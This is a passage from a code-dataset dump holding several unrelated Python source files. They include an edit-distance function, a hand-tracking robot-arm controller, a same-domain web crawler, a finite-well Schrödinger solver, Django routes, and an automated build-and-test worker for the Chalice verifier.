file_checkers=file_checkers, overwrite=args.overwrite,\n call=call, keep_delete_files=keep_delete_files, to_delete=to_delete)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"rasilab/rp-bp","sub_path":"rpbp/orf_profile_construction/create_base_genome_profile.py","file_name":"create_base_genome_profile.py","file_ext":"py","file_size_in_byte":10302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14680681625","text":"## EDIT DISTANCE FUNCTION To Correct the misspelled words\ndef minDis(s1, s2, n, m, dp) :\n \n if(n == 0) :\n return m \n if(m == 0) :\n return n\n \n if(dp[n][m] != -1) :\n return dp[n][m];\n \n if(s1[n - 1] == s2[m - 1]) : \n if(dp[n - 1][m - 1] == -1) :\n dp[n][m] = minDis(s1, s2, n - 1, m - 1, dp)\n return dp[n][m] \n else :\n dp[n][m] = dp[n - 1][m - 1]\n return dp[n][m]\n \n else : \n if(dp[n - 1][m] != -1) : \n m1 = dp[n - 1][m] \n else :\n m1 = 
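# Every pipeline step above funnels through shell_utils.call_if_not_exists,
# which skips a command when its outputs already exist (unless --overwrite is
# given) and can validate the outputs afterwards. A stripped-down sketch of
# that guard -- not the pbio implementation itself:
import os
import subprocess

def call_if_outputs_missing(cmd, out_files, overwrite=False, checkers=None):
    if not overwrite and all(os.path.exists(f) for f in out_files):
        return                          # outputs present; skip this step
    subprocess.run(cmd, shell=True, check=True)
    for path, check in (checkers or {}).items():
        check(path)                     # e.g. bam_utils.check_bam_file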
minDis(s1, s2, n - 1, m, dp)\n \n if(dp[n][m - 1] != -1) : \n m2 = dp[n][m - 1] \n else :\n m2 = minDis(s1, s2, n, m - 1, dp) \n if(dp[n - 1][m - 1] != -1) : \n m3 = dp[n - 1][m - 1] \n else :\n m3 = minDis(s1, s2, n - 1, m - 1, dp)\n \n dp[n][m] = 1 + min(m1, min(m2, m3))\n return dp[n][m]\n","repo_name":"Abdullahw72/Breast-Cancer-Chatbot","sub_path":"Backend/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"fr","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"37633536875","text":"#!/usr/bin/env python3.8\n\nimport numpy as np\n\nimport geometry_msgs\nimport moveit_msgs.msg\nfrom sr_robot_commander.sr_arm_commander import SrArmCommander\nimport tf\nfrom typing import Dict\n\nfrom htrc_framework.base_robot_controllers import BaseArmController\nfrom htrc_framework.webcam_controller import HAND_LANDMARKS\n\n\nclass ArmController(BaseArmController):\n def __init__(self, name: str) -> None:\n super().__init__()\n self.commander: SrArmCommander = SrArmCommander(name=name)\n self.orientation: geometry_msgs.msg.PoseStamped.orientation = None\n self.constraints: moveit_msgs.msg.Constraints = None\n\n def set_required_landmarks(self) -> None:\n self.required_landmarks = [\n HAND_LANDMARKS.MIDDLE_FINGER_MCP,\n HAND_LANDMARKS.WRIST,\n ]\n\n def set_constraints(self) -> None:\n \"\"\"\n Set the joint constriants for the robot arm.\n \"\"\"\n\n self.constraints = moveit_msgs.msg.Constraints()\n self.constraints.name = \"all_constraints\"\n\n # Constrain the shoulder lift joint movement\n # Avoids the robot taking indirect routes to goals\n shoulder_lift_constraint = moveit_msgs.msg.JointConstraint()\n shoulder_lift_constraint.joint_name = \"ra_shoulder_lift_joint\"\n shoulder_lift_constraint.position = np.radians(-45)\n shoulder_lift_constraint.tolerance_below = np.radians(45)\n shoulder_lift_constraint.tolerance_above = np.radians(100)\n\n # Set the list of the constraints for every movement\n self.constraints.joint_constraints = [shoulder_lift_constraint]\n\n def move_to_start_pose(self) -> None:\n # Move to the predefined starting position\n self.commander.set_pose_reference_frame(\"ra_base\")\n self.commander.move_to_named_target(\"ra_start\")\n\n # Rotate the wrist so the hand is facing the ground\n self.commander.move_to_joint_value_target_unsafe(\n {\"ra_wrist_3_joint\": -180}, wait=True, angle_degrees=True\n )\n\n current_pose = self.commander.get_current_pose(\"ra_base\")\n\n starting_pose = geometry_msgs.msg.PoseStamped()\n\n # Set the custom starting position for this robot\n starting_pose.pose.position.x = 0.5\n starting_pose.pose.position.y = -0.5\n starting_pose.pose.position.z = current_pose.position.z\n\n # Transform the orientation to Euler from quaternion\n starting_orientation_euler = tf.transformations.euler_from_quaternion(\n (\n current_pose.orientation.x,\n current_pose.orientation.y,\n current_pose.orientation.z,\n current_pose.orientation.w,\n )\n )\n\n # Set the new custom starting orientation and transform it to quaternion\n starting_orientation = tf.transformations.quaternion_from_euler(\n starting_orientation_euler[0], starting_orientation_euler[1], 0\n )\n\n # Add the custom starting orientation to the pose object\n starting_pose.pose.orientation.x = starting_orientation[0]\n starting_pose.pose.orientation.y = starting_orientation[1]\n starting_pose.pose.orientation.z = starting_orientation[2]\n starting_pose.pose.orientation.w = starting_orientation[3]\n\n self.orientation = 
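# minDis above memoizes the top-down recurrence; the same edit distance can be
# filled bottom-up in an (n+1) x (m+1) table, which sidesteps Python's
# recursion limit on long words:
def edit_distance(s1, s2):
    n, m = len(s1), len(s2)
    dp = [[0] * (m + 1) for _ in range(n + 1)]
    for i in range(n + 1):
        dp[i][0] = i                          # delete all of s1[:i]
    for j in range(m + 1):
        dp[0][j] = j                          # insert all of s2[:j]
    for i in range(1, n + 1):
        for j in range(1, m + 1):
            if s1[i - 1] == s2[j - 1]:
                dp[i][j] = dp[i - 1][j - 1]
            else:
                dp[i][j] = 1 + min(dp[i - 1][j],       # delete
                                   dp[i][j - 1],       # insert
                                   dp[i - 1][j - 1])   # substitute
    return dp[n][m]

assert edit_distance("kitten", "sitting") == 3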
starting_pose.pose.orientation\n\n self.set_constraints()\n\n # Move the robot to the custom starting position\n self.commander.move_to_pose_value_target_unsafe(starting_pose)\n\n def process_landmark_data(\n self, landmark_data: Dict[str, Dict[HAND_LANDMARKS, float]]\n ) -> Dict[str, float]:\n \"\"\"\n Calculate the end effector goal coordinates from landmark data.\n \"\"\"\n\n # Extract the middle finger MCP data\n mid_finger_x = landmark_data[\"x\"][HAND_LANDMARKS.MIDDLE_FINGER_MCP]\n mid_finger_y = landmark_data[\"y\"][HAND_LANDMARKS.MIDDLE_FINGER_MCP]\n\n # Get the normalised distance from the wrist to the middle finger MCP\n squared_x_dist = (\n landmark_data[\"x\"][HAND_LANDMARKS.WRIST]\n - landmark_data[\"x\"][HAND_LANDMARKS.MIDDLE_FINGER_MCP]\n ) ** 2\n squared_y_dist = (\n landmark_data[\"y\"][HAND_LANDMARKS.WRIST]\n - landmark_data[\"y\"][HAND_LANDMARKS.MIDDLE_FINGER_MCP]\n ) ** 2\n norm_dist = np.sqrt(squared_x_dist + squared_y_dist)\n\n # Map the data to coordinates within the arm end effector's desired range\n arm_position_dict = {\n \"x\": -mid_finger_y + 1,\n \"y\": -mid_finger_x * 2 + 1,\n \"z\": max(0.1, 0.7 - norm_dist),\n }\n\n return arm_position_dict\n\n def publish_move(self) -> None:\n while True:\n # Get data from the queue\n landmark_data = self.data_queue.get()\n\n # Exit thread if end signal received\n if landmark_data == \"END\":\n return\n\n # If there is data in the queue\n if landmark_data is not None:\n arm_position_dict = self.process_landmark_data(landmark_data)\n\n # Construct the geometry message to send to the robot\n target = geometry_msgs.msg.PoseStamped()\n target.pose.orientation = self.orientation\n\n target.pose.position.x = arm_position_dict[\"x\"]\n target.pose.position.y = arm_position_dict[\"y\"]\n target.pose.position.z = arm_position_dict[\"z\"]\n\n # Move the robot\n self.commander.move_to_pose_value_target_unsafe(\n target, wait=False, ik_constraints=self.constraints\n )\n","repo_name":"Aashvin/hand-tracking-robot-control","sub_path":"htrc_controllers/src/htrc_controllers/sr_arm_position_controller.py","file_name":"sr_arm_position_controller.py","file_ext":"py","file_size_in_byte":5656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72275509907","text":"from urllib.request import urlopen #module allows connections to url\nfrom link_finder import LinkFinder\nfrom domain import *\nfrom general import *\n\n#takes the links and then grabs all the links in the html and send it to link finder and \n#add the links to the link finder waiting list.\n#after waiting list it will send the link to crawled list\n\n#(⊙o⊙)\n\nclass Spider:\n #class variables (shared between all the instances)\n project_name = ''\n base_url = '' \n domain_name = ''\n #save file data variables.save data to file\n queue_file = ''\n crawled_file = ''\n #work during execution\n queue = set()\n crawled = set()\n \n def __init__(self, project_name, base_url, domain_name):\n Spider.project_name = project_name\n Spider.base_url = base_url\n Spider.domain_name = domain_name\n Spider.queue_file = Spider.project_name + '/queue.txt'\n Spider.crawled_file = Spider.project_name + '/crawled.txt'\n self.boot()\n self.crawl_page('First spider', Spider.base_url)\n \n @staticmethod #tells that this is static method may not use in class specific code\n def boot():\n create_project_directory(Spider.project_name)\n create_data_files(Spider.project_name, Spider.base_url)\n Spider.queue = file_to_set(Spider.queue_file)\n 
Spider.crawled = file_to_set(Spider.crawled_file)\n \n @staticmethod\n def crawl_page(thread_name, page_url):\n if page_url not in Spider.crawled:\n print(thread_name + ' now crawling ' + page_url)\n print('Queue ' + str(len(Spider.queue)) + ' | Crawled ' + str(len(Spider.crawled)))\n Spider.add_links_to_queue(Spider.gather_links(page_url))\n Spider.queue.remove(page_url)\n Spider.crawled.add(page_url)\n Spider.update_files()\n\n #connect to site convert 0 1 to readable format\n #passes it to the link finder and finds all the url if ther eis no issue\n @staticmethod\n def gather_links(page_url):\n html_string = ''\n try:\n response = urlopen(page_url)\n if 'text/html' in response.getheader('Content-Type'):\n html_bytes = response.read()\n html_string = html_bytes.decode(\"utf-8\")\n finder = LinkFinder(Spider.base_url, page_url)\n finder.feed(html_string)\n except Exception as e:\n print(str(e))\n return set()\n return finder.page_links()\n\n @staticmethod\n def add_links_to_queue(links):\n #check that link is not in crawl queue list\n for url in links:\n if (url in Spider.queue) or (url in Spider.crawled):\n continue\n if Spider.domain_name != get_domain_name(url):\n continue\n Spider.queue.add(url)\n @staticmethod\n def update_files():\n set_to_file(Spider.queue, Spider.queue_file)\n set_to_file(Spider.crawled, Spider.crawled_file)\n \n \n \n \n ","repo_name":"atif044/Web-Crawler","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":3004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"69851423185","text":"'''Author- MD ELIOUS ALI MONDAL\r\n Created - 20/12/17'''\r\n#solving the schroedinger equation for finite well\r\nimport time\r\nstart = time.perf_counter()\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n#step size for x\r\nh = 0.01\r\n\r\n#no. 
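# Spider persists its queue/crawled sets through file_to_set and set_to_file
# from general.py, which is not shown in this record. Plausible
# one-URL-per-line implementations, consistent with how they are called above
# (these are guesses, not the author's code):
def file_to_set(file_name):
    with open(file_name, 'rt') as f:
        return set(line.strip() for line in f if line.strip())

def set_to_file(links, file_name):
    with open(file_name, 'w') as f:
        for link in sorted(links):
            f.write(link + '\n')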
of x points\r\nn = int(6/h)+1\r\n\r\n#defining the potential\r\ndef V(x):\r\n '''returns V as a function of x'''\r\n if x < -1 or x > 1:\r\n return 10\r\n elif x >= -1 and x <= 1:\r\n return 0\r\n\r\n#defining the function to carry out Numerov method\r\ndef Numerov(x,y1,y2,E):\r\n '''returns y[i+1] value'''\r\n u = 1 - (1/6.)*(h**2)*(V(x)-E)\r\n return ((12-10*u)*y1-u*y2)/u\r\n\r\n#generating the arrays to store the x and Psi values\r\nx = np.linspace(-3,3,n)\r\ny = np.zeros(n)\r\nz = 0.000001\r\ny[1] = z*h\r\n\r\n#defining a function to carry out Numerov for a given E\r\ndef Psi(E):\r\n for i in range(2,n):\r\n y[i] = Numerov(x[i],y[i-1],y[i-2],E)\r\n N_const = 0 #Inverse of square of Normalisation constant\r\n for j in y:\r\n N_const = N_const + j*j*h\r\n A = 1.0/np.sqrt(N_const)\r\n m = A*y\r\n return(m[-1],m)\r\n\r\n#finding the energy values\r\nEigenvalues = []\r\na = np.linspace(0.1,9.9,100)\r\nP = np.array([Psi(i)[0] for i in a])\r\nfor i in range(len(P)-1):\r\n if (P[i]<0 and P[i+1]>0) or (P[i]>0 and P[i+1]<0):\r\n #print(P[i],P[i+1])\r\n low = a[i]\r\n high = a[i+1]\r\n mid = (low + high)/2.\r\n #iteration = 0\r\n while abs(Psi(mid)[0]) > h**2:\r\n mid = (low + high)/2.\r\n if P[i] < 0:\r\n if Psi(mid)[0] < 0:\r\n low = mid\r\n else:\r\n high = mid\r\n elif P[i] > 0:\r\n if Psi(mid)[0] > 0:\r\n low = mid\r\n else:\r\n high = mid\r\n #iteration +=1\r\n Eigenvalues.append(mid)\r\n #print(iteration)\r\n\r\nend = time.perf_counter()\r\ntime_taken = end - start\r\nprint(Eigenvalues)\r\nprint('Time taken to execute the code is ',time_taken,' seconds')\r\n\r\n#Plotting the obtained wavefunction\r\nplt.figure(1)\r\nplt.title('Numerical solution of finite well')\r\n\r\nfor i in Eigenvalues:\r\n q = Psi(i) #0.813086, 3.1956 , 6.8963\r\n plt.plot(x,q[1]+1)\r\n\r\nV = np.array([V(i)/5. for i in x])\r\nplt.plot(x,V,'black')\r\nplt.show()\r\n","repo_name":"EliousMondal/1D-Schrodinger_solver","sub_path":"1D_TISE_py.py","file_name":"1D_TISE_py.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"31201736117","text":"from django.urls import path\nfrom django.contrib import admin\nfrom .views import TaskList, TaskDetail, TaskCreate, TaskUpdate ,DeleteView,CustomLoginView,RegisterPage\nfrom django.contrib.auth.views import LogoutView\nfrom . 
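# The Numerov helper above integrates y'' = (V(x) - E) y with a two-term
# update; the textbook three-point Numerov scheme keeps the coefficient at
# each grid point and carries h^2/12 (the code above folds in h^2/6, which is
# worth double-checking against the derivation). With f_i = V(x_i) - E:
def numerov_step(y_prev, y_curr, f_prev, f_curr, f_next, h):
    c_prev = 1.0 - (h * h / 12.0) * f_prev
    c_curr = 2.0 * (1.0 + (5.0 * h * h / 12.0) * f_curr)
    c_next = 1.0 - (h * h / 12.0) * f_next
    return (c_curr * y_curr - c_prev * y_prev) / c_next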
import views\nfrom .views import (TodoListApiView,CustomTokenObtainPairView)\n\nurlpatterns = [\n path('login/',CustomLoginView.as_view(), name='login'),\n path('logout/',LogoutView.as_view(next_page='login'), name='logout'),\n path('register/',RegisterPage.as_view() ,name='register'),\n path('api/tasks/',TaskList.as_view(), name='tasks'),\n path('api/tasks//', TaskDetail.as_view(), name='task'),\n path('api/tasks/create/', TaskCreate.as_view(), name='task-create'),\n path('api/tasks//update/', TaskUpdate.as_view(), name='task-update'),\n path('api/tasks//delete/', DeleteView.as_view(), name='task-delete'),\n # path('api/taskss/', views.TaskListAPIView.as_view(), name='api-task-list'),\n # path('api/tasks//', views.TaskDetailAPIView.as_view(), name='api-task-detail'),\n path('custmam-token/', CustomTokenObtainPairView.as_view(), name='custom-token'),\n path('api/', TodoListApiView.as_view(), name='api-todo-list'),\n]\n\nadmin.site.index_title = 'Ahmed Tarek Radwan(ATR) 🦅 & Dragons 🐉'\nadmin.site.site_header = 'Dragons 🐉'\nadmin.site.site_title = \"TODO_LIST_APP 🦅 \"","repo_name":"ahmedradwan21/TODO__APP","sub_path":"base/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"74586960465","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def partition(self, head: Optional[ListNode], x: int) -> Optional[ListNode]:\n h1 = l1 = ListNode(0)\n h2 = l2 = ListNode(0)\n\n # Want to get every value to the left of x\n # and every value to the right of x then\n # connect left with right\n while head:\n if head.val < x:\n l1.next = head\n l1 = l1.next\n else:\n l2.next = head\n l2 = l2.next\n head = head.next\n\n l2.next = None # Avoiding cycles\n l1.next = h2.next # Connecting left and right\n return h1.next\n\n# Time Complexity: O(n)\n# Space Complexity: O(1)\n# Solution: https://www.youtube.com/watch?v=KT1iUciJr4g","repo_name":"garzeah/algorithms","sub_path":"linked_lists/partition_list.py","file_name":"partition_list.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30687650362","text":"file = \"../_ser/lininteg.py\"\n\nout = [\"namespace mfem {\"]\nfid = open(file, 'r')\nfor line in fid.readlines():\n if line.startswith(\"class\"):\n cname = (line.split(' ')[1]).split('(')[0]\n \n if line.startswith(\" def __init__\"):\n pp = \"\"\n if line.find(\"*args\") != -1:\n pp = \" self._coeff = args\"\n elif line.find(\", QG\") != -1:\n pp = \" self._coeff = QG\"\n elif line.find(\", QF)\") != -1:\n pp = \" self._coeff = QF\"\n elif line.find(\", F)\") != -1:\n pp = \" self._coeff = F\"\n elif line.find(\", f, s=1.0, ir=None)\") != -1:\n pp = \" self._coeff = (f, ir)\"\n elif line.find(\", uD_, lambda_, mu_, alpha_, kappa_)\") != -1:\n pp = \" self._coeff = uD_\"\n elif line.find(\"(self)\") != -1:\n pass\n else:\n print(cname)\n print(line)\n assert False, \"No recipt for this pattern \"\n if pp != \"\":\n out.append(\"%pythonappend \" + cname + \"::\" + cname + \" %{\")\n out.append(pp)\n out.append(\"%}\")\nfid.close()\nout.append(\"}\")\n\nfid = open(\"lininteg_ext.i\", 
\"w\")\nfid.write(\"\\n\".join(out))\nfid.close()\n\n","repo_name":"mfem/PyMFEM","sub_path":"mfem/common/generate_lininteg_ext.py","file_name":"generate_lininteg_ext.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":159,"dataset":"github-code","pt":"48"} +{"seq_id":"25398206447","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import datasets, metrics\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.neural_network import BernoulliRBM\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.pipeline import Pipeline\n\ndatabase = datasets.load_digits()\npredictors = np.asarray(database.data, 'float32')\nclasse = database.target\n\nnormalizer = MinMaxScaler(feature_range = (0,1))\npredictors = normalizer.fit_transform(predictors)\n\ntrain_predictors, test_predictors, train_class, test_class = train_test_split(predictors,\n classe,\n test_size = 0.2,\n random_state = 0)\n\nrbm = BernoulliRBM(random_state = 0)\nrbm.n_iter = 25\nrbm.n_components = 50\nnaive_rbm = GaussianNB()\nclassifier_rbm = Pipeline(steps = [('rbm', rbm), ('naive', naive_rbm)])\nclassifier_rbm.fit(train_predictors, train_class)\n\nplt.figure(figsize=(20, 20))\nfor i, comp in enumerate(rbm.components_):\n plt.subplot(10, 10, i+1)\n plt.imshow(comp.reshape((8,8)), cmap=plt.cm.gray_r)\n plt.xticks(())\n plt.yticks(())\nplt.show()\n\npredictions_rbm = classifier_rbm.predict(test_predictors)\nprecision_rbm = metrics.accuracy_score(predictions_rbm, test_class)\n\nnaive_simple = GaussianNB()\nnaive_simple.fit(train_predictors, train_class)\npredictions_naive = naive_simple.predict(test_predictors)\nprecision_naive = metrics.accuracy_score(predictions_naive, test_class)","repo_name":"Chbmleao/Deep-Learning-with-Python","sub_path":"RestrictedBoltzmannMachines/image_dimension_reduction.py","file_name":"image_dimension_reduction.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6688468209","text":"import os\nimport re\nfrom shutil import make_archive\nfrom aste.aste import BuildError, NonBuildError\nfrom aste.workers.workers import BaseWorker, BuildWorker, accept, raiseNonBuildError\nfrom aste.workers.mixins import MercurialMixin\nimport aste.workers.svnworkers\nimport aste.utils.errorhandling as errorhandling\n\nclass CheckoutWorker(MercurialMixin, BaseWorker):\n \"\"\"Checks out the sources of Chalice. 
The build data is stored in the\n environment using the corresponding method name as the key, e.g.\n in ``env.data[CheckoutWorker.DID]['getChalice']``.\n \"\"\"\n\n # That DID is hard-coded into reporting/reporting.py in order to generate\n # parts of the report, hence we use the same here.\n DID = aste.workers.svnworkers.CheckoutWorker.DID\n\n def __init__(self, env):\n super(CheckoutWorker, self).__init__(env)\n if (not self.DID in self.env.data):\n self.env.data[self.DID] = {}\n\n @errorhandling.add_context(\"Checking out Chalice from CodePlex\")\n def getChalice(self):\n \"\"\"Downloads the Chalice sources from ``HG.Chalice`` to\n ``Paths.Chalice``.\n \"\"\"\n \n result = self.hg_get_source(self.cfg.HG.Chalice, self.cfg.Paths.Chalice, \"Chalice\", self.cfg.HG.Update)\n \n self.env.data[self.DID]['getChalice'] = result\n\n self.noteSummary('Chalice revision: %s' % result['last_changed_revision'],\n prefix='# ')\n\n\ndef _raiseBuildError(match):\n raise BuildError(\"Aborted due to error: \" + match)\n\nclass ChaliceMatchingWorker(BuildWorker):\n def __init__(self, env, project_name):\n super(ChaliceMatchingWorker, self).__init__(env, project_name)\n \n matchers = {\n 'build': [\n (\n ['(\\[warn\\] .+:\\d+: .*)'],\n # ['(?m)^(\\[warn\\] .+:\\d+: .*)$'],\n [accept],\n [str]\n ), (\n ['(\\[error\\] .+:\\d+: .*)'],\n # ['(?m)^(\\[error\\] .+:\\d+: .*)$'],\n [_raiseBuildError], # Python 2.7: Can't raise an error inside a lambda expression, hence this method call\n [str]\n )\n ],\n 'envfatals': [\n (\n ['(java.io.IOException: .*)'],\n [raiseNonBuildError], [lambda match: match[0]]\n ), (\n ['The process cannot access the file because it is being used by another process'],\n [raiseNonBuildError], [lambda match: match[0]]\n )\n ]\n }\n \n def _matchDefaults(self, output):\n \"\"\"Matches the ``output`` with the matcher groups\n *envfatals* and *build*, and returns the matches in a single list.\n \"\"\"\n \n # output = _mock_compile_output_warnings\n # Mock output is defined at the end of this file\n \n matches = self.matchNamedGroup('envfatals', output)\n matches += self.matchNamedGroup('build', output)\n\n return matches\n\n\nclass ChaliceWorker(ChaliceMatchingWorker):\n \"\"\"Implements the steps necessary to build and test Chalice.\n \"\"\"\n\n def __init__(self, env):\n super(ChaliceWorker, self).__init__(env, 'Chalice')\n\n # def set_version_number(self):\n # \"\"\"\n # .. todo::\n # Give Chalice a build version/timestamp that makes it possible to\n # identify and order Chalice builds.\n # \"\"\"\n \n def checkoutChalice(self):\n checkoutWorker = CheckoutWorker(self.env)\n checkoutWorker.getChalice()\n\n def __runSbtBasedTool(self, sbtCmd):\n cmdSetIvyHome = \"set JAVA_OPTS=-Dsbt.ivy.home=\" + self.cfg.Paths.Sbt.IvyHome\n cmd = 'cmd /c \"(%s) && (%s)\"' % (cmdSetIvyHome, sbtCmd)\n \n # Execute command and match against error/success patterns. 
These patterns should\n # include Sbt errors and failures and Java exceptions.\n return self._runDefaultBuildStep(cmd)\n \n def buildChalice(self):\n self.cd(self.cfg.Paths.Chalice + \"\\\\Chalice\")\n \n # cmdSetIvyHome = \"set JAVA_OPTS=-Dsbt.ivy.home=\" + self.cfg.Paths.Sbt.IvyHome\n \n cmd = \"sbt.bat clean compile\"\n \n # cmd = 'cmd /c \"(%s) && (%s)\"' % (cmdSetIvyHome, cmdSbt)\n # cmd = 'cmd /c \"%s\"' % (cmdSbt)\n # cmd = \"%s\" % (cmdSbt)\n \n # cmd = 'cmd.exe /C rem'\n # Noop cmd, for example for the case that \n # ChaliceMatchingWorker._matchDefaults overwrites the received\n # output with mock output.\n \n # self._runDefaultBuildStep(cmd)\n self.__runSbtBasedTool(cmd)\n\n def testChalice(self):\n # Matcher detecting a failed test case. The match group (*.?) captures\n # the name of the failing test case.\n failMatcher = [(['(?m)^FAIL: (.*?)$', '(?m)^ERROR: (.*?)$'], [accept], [str])]\n successMatcher = [(['(?m)^OK: (.*?)$'], [accept], [str])]\n \n summaryMatcher = [(\n ['(?:SUMMARY: completed (\\d+) tests successfully.)|(?:SUMMARY: \\d+ of (\\d+) tests failed.)'],\n [accept],\n [lambda match: int(next((e for e in match if e.isdigit()), None))]\n )]\n \n self.cd(self.cfg.Paths.Chalice + \"\\\\Chalice\\\\tests\")\n \n cmd = \"runalltests.bat /boogie:%s /boogieOpt:z3exe:%s\" % (self.cfg.Apps.Boogie, self.cfg.Apps.Z3)\n \n # result = {'output': mock_test_output_fails_oks}\n # Mock output is defined at the end of this file\n\n result = self.run(cmd)\n \n failMatches = self.matchGroup(failMatcher, result['output'])\n successMatches = self.matchGroup(successMatcher, result['output'])\n summaryMatches = self.matchGroup(summaryMatcher, result['output'])\n \n tests = summaryMatches[0]\n \n self.noteSummary(\"%s out of %s test(s) failed\" % (len(failMatches), tests))\n\n if len(failMatches) > 0:\n self.logSummary(str(failMatches))\n\n self.project_data['tests']['failed'] = failMatches\n \n def check_z3_version(self, required_version_str):\n \"\"\"\n .. todo:: Accepts only one Z3 version, use range min-max instead.\n \"\"\"\n\n cmd = \"%s /version\" % self.cfg.Apps.Z3\n result = self.runSafely(cmd)\n \n match = re.match('Z3 version (\\d+\\.?\\d*)', result['output'])\n found_version_str = match.group(1)\n \n if found_version_str != required_version_str:\n msg = \"Expected Z3 %s but found: %s\" % (required_version_str, found_version_str)\n self.abort(msg, command=cmd, returncode=result['returncode'],\n output=result['output'], exception_class=NonBuildError)\n\n def zip_binaries(self, filename):\n self.cd(self.cfg.Paths.Chalice + \"\\\\Chalice\\\\scripts\\\\create_release\")\n cmd = \"create_release.bat\"\n # self.runSafely(cmd)\n self.__runSbtBasedTool(cmd)\n # make_archive expects an archive name without a filename extension.\n archive_name = os.path.splitext(os.path.abspath(filename))[0]\n root_dir = os.path.abspath(\"release\")\n make_archive(archive_name, 'zip', root_dir)\n \n \n# _mock_compile_output_warnings = \"\"\"\n# [info] Set current project to default-c3764d (in build file:/C:/Temp/aste/Boogie/Chalice/)\n# [success] Total time: 1 s, completed 17.08.2011 15:37:00\n# [info] Updating {file:/C:/Temp/aste/Boogie/Chalice/}default-c3764d...\n# [info] Done updating.\n# [info] Compiling 11 Scala sources to C:\\Temp\\aste\\Boogie\\Chalice\\target\\scala-2.8.1.final\\classes...\n# [warn] C:\\Temp\\aste\\Boogie\\Chalice\\src\\main\\scala\\Ast.scala:77: case class `class SeqClass' has case class ancestor `class Class'. 
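# The matcher groups above pair regex patterns with handler callbacks
# (accept, _raiseBuildError, raiseNonBuildError). The same idea in miniature,
# scanning sbt output for [warn]/[error] lines -- a simplified stand-in for
# matchNamedGroup, whose real implementation lives elsewhere in aste:
import re

def scan_build_output(output):
    warnings = re.findall(r'\[warn\] .+?:\d+: .*', output)
    errors = re.findall(r'\[error\] .+?:\d+: .*', output)
    if errors:
        raise RuntimeError('Aborted due to error: ' + errors[0])
    return warnings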
This has been deprecated for unduly complicating both usage and implementation. You should instead use extractors for pattern matching on non-leaf nodes.\n# [warn] sealed case class SeqClass(parameter: Class) extends Class(\"seq\", List(parameter), \"default\", Nil) {\n# [warn] ^\n# [warn] C:\\Temp\\aste\\Boogie\\Chalice\\src\\main\\scala\\Ast.scala:111: case class `class TokenClass' has case class ancestor `class Class'. This has been deprecated for unduly complicating both usage and implementation. You should instead use extractors for pattern matching on non-leaf nodes.\n# [warn] case class TokenClass(c: Type, m: String) extends Class(\"token\", Nil, \"default\", List(\n# [warn] ^\n# [warn] C:\\Temp\\aste\\Boogie\\Chalice\\src\\main\\scala\\Ast.scala:121: case class `class ChannelClass' has case class ancestor `class Class'. This has been deprecated for unduly complicating both usage and implementation. You should instead use extractors for pattern matching on non-leaf nodes.\n# [warn] case class ChannelClass(ch: Channel) extends Class(ch.id, Nil, \"default\", Nil) {\n# [warn] ^\n# [warn] C:\\Temp\\aste\\Boogie\\Chalice\\src\\main\\scala\\Ast.scala:141: case class `class TokenType' has case class ancestor `class Type'. This has been deprecated for unduly complicating both usage and implementation. You should instead use extractors for pattern matching on non-leaf nodes.\n# [warn] sealed case class TokenType(C: Type, m: String) extends Type(\"token\", Nil) { // denotes the use of a type\n# [warn] ^\n# [warn] C:\\Temp\\aste\\Boogie\\Chalice\\src\\main\\scala\\Ast.scala:168: case class `class SpecialField' has case class ancestor `class Field'. This has been deprecated for unduly complicating both usage and implementation. You should instead use extractors for pattern matching on non-leaf nodes.\n# [warn] case class SpecialField(name: String, tp: Type, hidden: Boolean) extends Field(name, tp, false) { // direct assignments are not allowed to a SpecialField\n# [warn] ^\n# [warn] C:\\Temp\\aste\\Boogie\\Chalice\\src\\main\\scala\\Ast.scala:212: case class `class SpecialVariable' has case class ancestor `class Variable'. This has been deprecated for unduly complicating both usage and implementation. 
You should instead use extractors for pattern matching on non-leaf nodes.\n# [warn] case class SpecialVariable(name: String, typ: Type) extends Variable(name, typ, false, false) {\n# [warn] ^\n# [warn] 6 warnings found\n# [success] Total time: 49 s, completed 17.08.2011 15:37:50\n# \"\"\"\n\n# mock_test_output_fails_oks = \"\"\"\n# Running tests in examples ...\n# ------------------------------------------------------\n# FAIL: AssociationList.chalice\n# FAIL: BackgroundComputation.chalice\n# FAIL: cell.chalice\n# FAIL: CopyLessMessagePassing-with-ack.chalice\n# FAIL: CopyLessMessagePassing-with-ack2.chalice\n# FAIL: CopyLessMessagePassing.chalice\n# FAIL: dining-philosophers.chalice\n# FAIL: FictionallyDisjointCells.chalice\n# FAIL: ForkJoin.chalice\n# FAIL: HandOverHand.chalice\n# FAIL: iterator.chalice\n# FAIL: iterator2.chalice\n# FAIL: linkedlist.chalice\n# FAIL: OwickiGries.chalice\n# FAIL: PetersonsAlgorithm.chalice\n# FAIL: ProdConsChannel.chalice\n# FAIL: producer-consumer.chalice\n# FAIL: RockBand.chalice\n# FAIL: Sieve.chalice\n# FAIL: Solver.chalice\n# FAIL: swap.chalice\n# FAIL: TreeOfWorker.chalice\n# FAIL: 